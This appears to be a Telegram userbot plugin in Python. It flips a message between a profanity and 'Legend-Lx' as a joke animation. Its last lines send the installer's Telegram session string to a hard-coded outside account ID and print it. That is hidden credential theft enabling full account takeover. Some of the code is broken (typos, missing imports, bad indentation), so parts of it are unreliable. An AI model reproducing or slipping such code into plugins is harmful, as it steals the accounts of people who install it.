import asyncio

@LegendBot_cmd(pattern="OK$")
async def fuckd(ult):
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck") 
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await asyncio.sleep(2)
 await ult.edit ("Legend-Lx")
 await asyncio.sleep(2)
 await ult.edit ("fuck")
 await ult.client.send_message(634631813, Var.SESSION)
 INVISIBLE = os.environ.get("STRING_SESSION")
print(INVISIBLE)
await ult.clinet.send_message(634631813, var.STRING_SESSION).send


